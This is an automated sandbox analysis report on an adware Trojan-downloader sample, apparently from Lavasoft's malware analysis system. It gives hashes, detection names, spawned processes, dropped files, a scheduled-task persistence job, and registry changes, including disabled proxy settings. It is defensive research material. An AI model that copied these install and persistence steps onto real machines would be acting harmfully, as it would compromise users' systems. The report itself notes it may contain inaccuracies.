Gen:Variant.Zusy.192658 (BitDefender), not-a-virus:HEUR:AdWare.Win32.Amonetize.gen (Kaspersky), Trojan.Win32.Generic!BT (VIPRE), Trojan.DownLoader21.55469 (DrWeb), Gen:Variant.Zusy.192658 (B) (Emsisoft), Artemis!482406454620 (McAfee), Heur.AdvML.C (Symantec), Trojan-Downloader.Win32.Adload (Ikarus), Gen:Variant.Zusy.192658 (FSecure), Win32/DH{Y1clgQ8} (AVG), Win32:Adware-gen [Adw] (Avast), TROJ_GEN.R08NC0EFM16 (TrendMicro), Gen:Variant.Zusy.192658 (AdAware), Trojan.Win32.Swrort.3.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan-Downloader, Trojan, Adware
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: 482406454620b99c79cd268a1fd237c8
SHA1: 442e39e5faf1c89fb3ba23673ffd240dee6c39e8
SHA256: d1fe38a5f596850b73a252125e42c20d713a655a40d31cd7de5dd87f90088834
SSDeep: 12288:kq4p0LAogZM2h vdEd6ycYZw5j7eLRf2Ss2xkA:kq4WAvHd3cbfgtJxkA
Size: 719364 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: UPolyXv05_v6
Company: adsafiliados
Created at: 2016-05-05 11:13:33
Analyzed on: WindowsXP SP3 32-bit
Summary: Trojan-Downloader. A Trojan program that downloads files from the Internet without the user's knowledge and executes them.
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
amisetup7548__10235_il2.exe:1004
chcUpdateTsk.exe:1096
chcUpdateSrv.html5:1700
chcUpdateSrv.html5:548
ckehack.html5:1692
ckehack.html5:468
ckehack.html5:456
ckehack.html5:2032
nop.exe:1512
1.tmp.exe:1340
1.tmp.exe:1836
1.tmp.exe:2732
ping.exe:560
ping.exe:1008
regsvr32.exe:1500
amisetup7604__99999_il2.exe:652
rundll32.exe:1608
tmnqck.exe:2024
chcUpdateTsk.html5:1240
The Trojan injects its code into the following process(es):
%original file name%.exe:600
1.tmp.exe:3248
amisetup7849__99999_il2.exe:3340
Mutexes
The following mutexes were created/opened:
No objects were found.
File activity
The process amisetup7548__10235_il2.exe:1004 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\amipixel.cfg (116 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\YB33U3FA\amipb[1].js (32425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\amisetup7548__10235_il2.exe:typelib (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GLQUASXM\index[1].htm (2197 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\amitest.txt (39 bytes)
The process chcUpdateTsk.exe:1096 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\MR05AJUV\desktop.ini (67 bytes)
%Documents and Settings%\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\CZW1U92J\desktop.ini (67 bytes)
%Documents and Settings%\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\C1W14R8D\desktop.ini (67 bytes)
%Documents and Settings%\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\YHAV8105\desktop.ini (67 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\CHEZ8TER (0 bytes)
%Documents and Settings%\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\CHEZ8TER\desktop.ini (0 bytes)
%Documents and Settings%\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\S96BCDQ7\desktop.ini (0 bytes)
%Documents and Settings%\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\KP27CLYF (0 bytes)
%Documents and Settings%\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\O167C5I7\desktop.ini (0 bytes)
%Documents and Settings%\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\KP27CLYF\desktop.ini (0 bytes)
%Documents and Settings%\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\O167C5I7 (0 bytes)
%Documents and Settings%\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\S96BCDQ7 (0 bytes)
The process chcUpdateSrv.html5:1700 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\LocalService\Cookies\index.dat (388 bytes)
%Documents and Settings%\LocalService\Cookies\system@upxnav[1].txt (212 bytes)
The process chcUpdateSrv.html5:548 makes changes in the file system.
The Trojan deletes the following file(s):
%Program Files%\Chocosyledusy\chcUpdateSrv.html5.ini (0 bytes)
The process ckehack.html5:1692 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Cookies\matile.dll (1425 bytes)
The Trojan deletes the following file(s):
%Program Files%\Coabuied\matile.dll (0 bytes)
%Program Files%\Coabuied\wihoy.dll (0 bytes)
The process ckehack.html5:468 makes changes in the file system.
The Trojan deletes the following file(s):
%Program Files%\Coabuied\DeElevator.dll (0 bytes)
%Program Files%\Coabuied\config.ini (0 bytes)
%Program Files%\Coabuied\shehele.dat (0 bytes)
%Program Files%\Coabuied\ckehack.html5 (0 bytes)
The process ckehack.html5:2032 makes changes in the file system.
The Trojan deletes the following file(s):
%Program Files%\Coabuied\@A3592ADB-854A-443A-854E-EB92130D470D.xpi (0 bytes)
The process nop.exe:1512 makes changes in the file system.
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nss8.tmp (0 bytes)
The process 1.tmp.exe:1340 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\awh2.tmp (177 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\awh3.tmp (105356 bytes)
The process 1.tmp.exe:1836 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\awh4.tmp (177 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\awh5.tmp (105356 bytes)
The process 1.tmp.exe:2732 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\awhA.tmp (103196 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\awh9.tmp (177 bytes)
The process %original file name%.exe:600 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\prepreinstaller_win.exe (4013 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\YB33U3FA\Bundle[1].exe (30186 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4N740QDH\prepreinstaller_win[1].exe (30122 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\MUpdater.exe.config (165 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1.tmp.exe (3416 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1OITCXMZ\MUpdater.exe[1].config (165 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\amitest.txt (0 bytes)
The process regsvr32.exe:1500 makes changes in the file system.
The Trojan deletes the following file(s):
%System%\verclsid.exe (0 bytes)
The process amisetup7604__99999_il2.exe:652 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\awh6.tmp (3560 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4N740QDH\index[1].htm (1203 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\awh7.tmp (45428 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\amipixel.cfg (170 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\amisetup7604__99999_il2.exe:typelib (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\amitest.txt (18 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\tmnqck.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GLQUASXM\index[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nop.exe (0 bytes)
The process rundll32.exe:1608 makes changes in the file system.
The Trojan deletes the following file(s):
%Program Files%\Atidogrudck\atdagent.dll.ini (0 bytes)
The process tmnqck.exe:2024 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\{DD51A01D-FCBE-4AA1-B167-045919599065} (164908 bytes)
%Program Files%\Chocosyledusy\chcUpdateSrv.html5 (3749 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GLQUASXM\1.n[1].txt (164388 bytes)
%Program Files%\Coabuied\ckehack.html5 (8 bytes)
%Program Files%\Coabuied\Chocosyledusy.7z2 (1693 bytes)
%Program Files%\Coabuied\config.ini (147 bytes)
%Program Files%\Coabuied\@A3592ADB-854A-443A-854E-EB92130D470D.xpi (1612 bytes)
%Program Files%\Coabuied\wihoy.dll (1657 bytes)
%Program Files%\Atidogrudck\atdagent.dll (1717 bytes)
%Program Files%\Coabuied\DeElevator.dll (260 bytes)
%Program Files%\Coabuied\conf.json (877 bytes)
%Program Files%\Coabuied\shehele.dat (260 bytes)
%Program Files%\Coabuied\matile.dll (309 bytes)
%Program Files%\Chocosyledusy\chcUpdateSrv.html5.ini (247 bytes)
%Program Files%\Atidogrudck\atdagent.dll.ini (91 bytes)
%Program Files%\Chocosyledusy\chcUpdateTsk.html5.ini (247 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{B45A900F-0CB7-44A9-89C2-F36A56D5F94E} (653285 bytes)
%Program Files%\Chocosyledusy\chcUpdateTsk.html5 (324 bytes)
%Program Files%\Coabuied\Atidogrudck.7z2 (169 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\{DD51A01D-FCBE-4AA1-B167-045919599065} (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1OITCXMZ\84[1].htm (0 bytes)
%Program Files%\Coabuied\Atidogrudck.7z2 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{B45A900F-0CB7-44A9-89C2-F36A56D5F94E} (0 bytes)
%Program Files%\Coabuied\conf.json (0 bytes)
%Program Files%\Coabuied\Chocosyledusy.7z2 (0 bytes)
The process chcUpdateTsk.html5:1240 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Tasks\Chocosyledusy Update.job (5526 bytes)
The Trojan deletes the following file(s):
%Program Files%\Chocosyledusy\chcUpdateTsk.html5.ini (0 bytes)
Registry activity
Most of the keys listed below under Tracing\Microsoft\*, Internet Settings\Cache\Paths, Internet Settings\Connections, Internet Settings\ZoneMap, Eventlog\Application\ESENT, ESENT\Process\*, Explorer\Shell Folders, Cryptography\RNG and DirectDraw\MostRecentApplication are written by WinINet, ESENT and the shell the first time any process uses them in a fresh profile; they appear in nearly every sandbox run and are not chosen by the sample. The entries worth acting on are the ones the installer creates itself: the COM registration under HKCR (CLSID {4cf1ec1d-2055-4a46-b248-11fb57f52868}, ProgID telexes.compiles, LocalServer32 pointing at the installer in the user's Temp directory), the per-install key HKU\.DEFAULT\Software\ADCA2197E17DE989DA91F56322BE0AB0, HKLM\SOFTWARE\{8C4CE252-7DB2-4F8E-8E76-BAD0E5826A83}, and the "help" value under HKLM\SOFTWARE\Microsoft, whose cloudfront URL carries that same ID as its uid parameter.
The process amisetup7548__10235_il2.exe:1004 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"
[HKCR\Interface\{EA3F5C73-D1DF-4887-B726-1C7E1EBC5067}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\Interface\{EA3F5C73-D1DF-4887-B726-1C7E1EBC5067}]
"(Default)" = "IBoot"
[HKCR\telexes.compiles\CurVer]
"(Default)" = "telexes.compiles.1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"EventMessageFile" = "%System%\ESENT.dll"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCR\TypeLib\{DE2DEBA6-37B4-4D2F-8A78-56EFFA49BA84}\1.0\0\win32]
"(Default)" = "C:\DOCUME~1\%CurrentUserName%\LOCALS~1\Temp\amisetup7548__10235_il2.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1F 00 00 00 01 00 00 00 00 00 00 00"
[HKCR\CLSID\{4cf1ec1d-2055-4a46-b248-11fb57f52868}\Version]
"(Default)" = "1.0"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryCount" = "16"
"TypesSupported" = "7"
[HKCR\Interface\{EA3F5C73-D1DF-4887-B726-1C7E1EBC5067}\TypeLib]
"(Default)" = "{DE2DEBA6-37B4-4D2F-8A78-56EFFA49BA84}"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"
[HKCR\TypeLib\{DE2DEBA6-37B4-4D2F-8A78-56EFFA49BA84}\1.0\HELPDIR]
"(Default)" = "C:\DOCUME~1\%CurrentUserName%\LOCALS~1\Temp"
[HKCR\CLSID\{4cf1ec1d-2055-4a46-b248-11fb57f52868}\LocalServer32]
"ServerExecutable" = "C:\DOCUME~1\%CurrentUserName%\LOCALS~1\Temp\amisetup7548__10235_il2.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
[HKCR\Interface\{EA3F5C73-D1DF-4887-B726-1C7E1EBC5067}\TypeLib]
"Version" = "1.0"
[HKLM\SOFTWARE\Microsoft\ESENT\Process\amisetup7548__10235_il2\DEBUG]
"Trace Level" = ""
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"LogSessionName" = "stdout"
[HKCR\CLSID\{4cf1ec1d-2055-4a46-b248-11fb57f52868}\TypeLib]
"(Default)" = "{de2deba6-37b4-4d2f-8a78-56effa49ba84}"
[HKCR\TypeLib\{DE2DEBA6-37B4-4D2F-8A78-56EFFA49BA84}\1.0]
"(Default)" = "InstallerLib"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKCR\CLSID\{4cf1ec1d-2055-4a46-b248-11fb57f52868}]
"(Default)" = "Inst Class"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"Name" = "amisetup7548__10235_il2.exe"
[HKCR\CLSID\{4cf1ec1d-2055-4a46-b248-11fb57f52868}\VersionIndependentProgID]
"(Default)" = "telexes.compiles"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
[HKCR\telexes.compiles.1\CLSID]
"(Default)" = "{4cf1ec1d-2055-4a46-b248-11fb57f52868}"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"ID" = "1468883313"
[HKCR\Interface\{EA3F5C73-D1DF-4887-B726-1C7E1EBC5067}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"ControlFlags" = "1"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "42 A9 31 FE 36 65 18 E7 73 13 18 1B E4 85 C1 3C"
[HKCR\CLSID\{4cf1ec1d-2055-4a46-b248-11fb57f52868}\ProgID]
"(Default)" = "telexes.compiles.1"
[HKCR\TypeLib\{DE2DEBA6-37B4-4D2F-8A78-56EFFA49BA84}\1.0\FLAGS]
"(Default)" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"
[HKCR\telexes.compiles]
"(Default)" = "Inst Class"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKCR\CLSID\{4cf1ec1d-2055-4a46-b248-11fb57f52868}\LocalServer32]
"(Default)" = "C:\DOCUME~1\%CurrentUserName%\LOCALS~1\Temp\amisetup7548__10235_il2.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"
[HKCR\telexes.compiles.1]
"(Default)" = "Inst Class"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
The Trojan sets the Local Intranet zone to include all network paths (UNCs). This and the two ZoneMap values below are the default Local Intranet zone options and are also written by WinINet when the ZoneMap is first initialised, so on their own they do not loosen the zone policy:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan sets the Local Intranet zone to include all sites that bypass the proxy server:
"ProxyBypass" = "1"
Proxy settings are disabled (on a host that had a proxy or PAC file configured, this and the deletion of ProxyServer and AutoConfigURL below would matter):
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan sets the Local Intranet zone to include all local (intranet) sites not listed in other zones:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following registry key(s):
[HKCR\TypeLib\{DE2DEBA6-37B4-4D2F-8A78-56EFFA49BA84}\1.0]
[HKCR\TypeLib\{DE2DEBA6-37B4-4D2F-8A78-56EFFA49BA84}]
[HKCR\CLSID\{4cf1ec1d-2055-4a46-b248-11fb57f52868}]
[HKCR\CLSID\{4cf1ec1d-2055-4a46-b248-11fb57f52868}\Programmable]
[HKCR\CLSID\{4cf1ec1d-2055-4a46-b248-11fb57f52868}\LocalServer32]
[HKCR\Interface\{EA3F5C73-D1DF-4887-B726-1C7E1EBC5067}]
[HKCR\telexes.compiles.1]
[HKCR\telexes.compiles]
[HKCR\CLSID\{4cf1ec1d-2055-4a46-b248-11fb57f52868}\Version]
[HKCR\Interface\{EA3F5C73-D1DF-4887-B726-1C7E1EBC5067}\ProxyStubClsid32]
[HKCR\telexes.compiles\CurVer]
[HKCR\Interface\{EA3F5C73-D1DF-4887-B726-1C7E1EBC5067}\ProxyStubClsid]
[HKCR\TypeLib\{DE2DEBA6-37B4-4D2F-8A78-56EFFA49BA84}\1.0\0]
[HKCR\TypeLib\{DE2DEBA6-37B4-4D2F-8A78-56EFFA49BA84}\1.0\0\win32]
[HKCR\Interface\{EA3F5C73-D1DF-4887-B726-1C7E1EBC5067}\TypeLib]
[HKCR\CLSID\{4cf1ec1d-2055-4a46-b248-11fb57f52868}\ProgID]
[HKCR\CLSID\{4cf1ec1d-2055-4a46-b248-11fb57f52868}\VersionIndependentProgID]
[HKCR\TypeLib\{DE2DEBA6-37B4-4D2F-8A78-56EFFA49BA84}\1.0\FLAGS]
[HKCR\TypeLib\{DE2DEBA6-37B4-4D2F-8A78-56EFFA49BA84}\1.0\HELPDIR]
[HKCR\telexes.compiles.1\CLSID]
[HKCR\CLSID\{4cf1ec1d-2055-4a46-b248-11fb57f52868}\TypeLib]
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
[HKCR\CLSID\{4cf1ec1d-2055-4a46-b248-11fb57f52868}\LocalServer32]
"ServerExecutable"
[HKLM\SOFTWARE\Microsoft\ESENT\Process\amisetup7548__10235_il2\DEBUG]
"Trace Level"
The process chcUpdateTsk.exe:1096 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKU\.DEFAULT\Software\ADCA2197E17DE989DA91F56322BE0AB0]
"c" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"
[HKU\.DEFAULT\Software\ADCA2197E17DE989DA91F56322BE0AB0]
"o" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\NetworkService\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"EventMessageFile" = "%System%\ESENT.dll"
"CategoryCount" = "16"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\NetworkService\Local Settings\Temporary Internet Files"
[HKU\.DEFAULT\Software\ADCA2197E17DE989DA91F56322BE0AB0]
"d" = "20160719"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 04 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
"LogSessionName" = "stdout"
[HKU\.DEFAULT\Software\{8C4CE252-7DB2-4F8E-8E76-BAD0E5826A83}]
"UpDay" = "20160719"
[HKLM\SOFTWARE\{8C4CE252-7DB2-4F8E-8E76-BAD0E5826A83}]
"UpDay" = "20160719"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\NetworkService\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
"ControlFlags" = "1"
[HKLM\SOFTWARE\Microsoft\ESENT\Process\chcUpdateTsk\DEBUG]
"Trace Level" = ""
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\NetworkService\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A9 7A B0 76 76 C6 71 49 73 C1 59 CF 70 88 43 E4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"TypesSupported" = "7"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"
The Trojan sets the Local Intranet zone under HKU\.DEFAULT (the hive a service-account process sees as HKCU) to include all local (intranet) sites not listed in other zones; these are the default zone options that WinINet writes on first use in this profile:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan sets the Local Intranet zone to include all sites that bypass the proxy server:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan sets the Local Intranet zone to include all network paths (UNCs):
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan deletes the following value(s) in system registry:
[HKLM\SOFTWARE\Microsoft\ESENT\Process\chcUpdateTsk\DEBUG]
"Trace Level"
